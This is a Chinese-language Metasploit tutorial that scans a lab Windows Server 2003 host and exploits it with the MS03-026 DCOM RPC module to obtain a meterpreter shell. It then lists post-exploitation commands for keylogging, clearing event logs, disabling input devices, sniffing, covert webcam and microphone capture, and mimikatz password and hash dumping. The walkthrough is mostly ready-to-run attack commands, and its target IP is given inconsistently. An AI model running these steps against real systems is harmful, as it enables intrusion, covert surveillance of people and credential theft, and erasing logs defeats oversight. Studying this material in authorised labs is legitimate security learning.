Kali之msf簡單的漏洞利用


0X01 信息收集

靶機的IP地址為:192.168.173.136

利用nmap工具掃描其開放端口、系統等

整理一下目標系統的相關信息

系統版本:Windows server 2003

開放的端口及服務:

21/tcp   	ftp
135/tcp  	msrpc
139/tcp  	netbios-ssn
445/tcp  	microsoft-ds
777/tcp  	multiling-http
1025/tcp 	NFS-or-IIS
1026/tcp 	LSA-or-nterm
1029/tcp 	ms-lsa
1030/tcp 	iad1
6002/tcp 	X11:2
7001/tcp 	afs3-callback
7002/tcp 	afs3-prserver
8099/tcp 	未知服務

0X02 漏洞分析

​ 從掃描出的端口發現,目標主機開啟了135端口,服務為msrpc(遠程過程調用服務),即Windows的RPC服務。

​ 針對這個服務,我們就可以嘗試去利用一下。

0X03 漏洞利用

kali機打開Metaspolit:

root@kali:~# msfconsole

查找所有跟Windows RPC相關的漏洞攻擊:

msf5 > search dcom

使用MS-03-026 進行攻擊:

msf5 > use exploit/windows/dcerpc/ms03_026_dcom 

為了實施攻擊,查看漏洞攻擊的選項和條件:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options

知道攻擊所需要的條件,接下來進行設置,只需要設置我們攻擊的目標主機即可:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136
RHOSTS => 192.168.174.136

設置好攻擊條件之后,接下來就進行攻擊:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit 

執行攻擊命令之后,我們獲取到了目標主機的shell權限,現在,可以執行命令查看目標主機的一些東西,比如網絡配置信息:

meterpreter > ipconfig

如需進一步攻擊利用,可配合其他命令進一步操作。

0X04 meterpreter下相關命令

基本系統命令
——————————
shell			進入目標主機cmd shell
reboot			重啟目標主機
shutdown		關閉目標主機
sysinfo			查看目標主機系統信息
background		將當前會話放置后台
info			查看已有信息模塊
run				執行已有的模塊,輸入run后按tab鍵補全,會列出已有的腳本
clearav 		清除windows中的應用程序日志、系統日志、安全日志
ipconfig		查看網絡配置信息
netstat			查看網絡連接信息
getproxy		查看代理信息
route			查看路由
arp				查看arp信息
進程列表:
——————————
getuid			獲取系統ID以及計算機名稱
getpid			獲取當前進程標識符
kill			結束進程
ps				列出正在運行中的進程
鼠標/鍵盤操作
——————————
keyscan_start	開啟按鍵記錄會話
keyscan_stop	終止按鍵記錄會話
keyscan_dump	轉儲從目標主機捕獲到的按鍵記錄
uictl enable mouse 		啟用鼠標
uictl disable mouse  	禁用鼠標
uictl enable keyboard	啟用鍵盤
uictl disable keyboard  禁用鍵盤
會話
——————————
enumdesktops	列舉所有可訪問到的桌面和工作站
getdesktop		獲取當前Meterpreter桌面
setdesktop		變更Meterpreter當前桌面
嗅探功能
——————————
use sniffer		加載嗅探功能
sniffer_interfaces   	查看網卡
sniffer_start	開始對網卡執行嗅探
sniffer_stats	查看狀態
sniffer_stop	停止對網卡的嗅探
sniffer_dump	將捕獲到的目標主機上的數據轉儲到本地
攝像頭命令
——————————
webcam_list		列舉系統所有的攝像頭
webcam_snap		使用目標主機攝像頭拍照
record_mic		從主機的默認麥克風中記錄環境聲音
webcam_stream	通過攝像頭開啟視頻
遠程桌面/截屏
——————————
enumdesktops	查看可用的桌面
getdesktop		獲取當前meterpreter 關聯的桌面
set_desktop		設置meterpreter關聯的桌面  -h查看幫助
screenshot		截屏
use espia		或者使用espia模塊截屏  然后輸入screengrab
run vnc			使用vnc遠程桌面連接
抓取密碼
——————————
load mimikatz	查看幫助
wdigest			獲取Wdigest密碼
mimikatz_command -f samdump::hashes		執行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM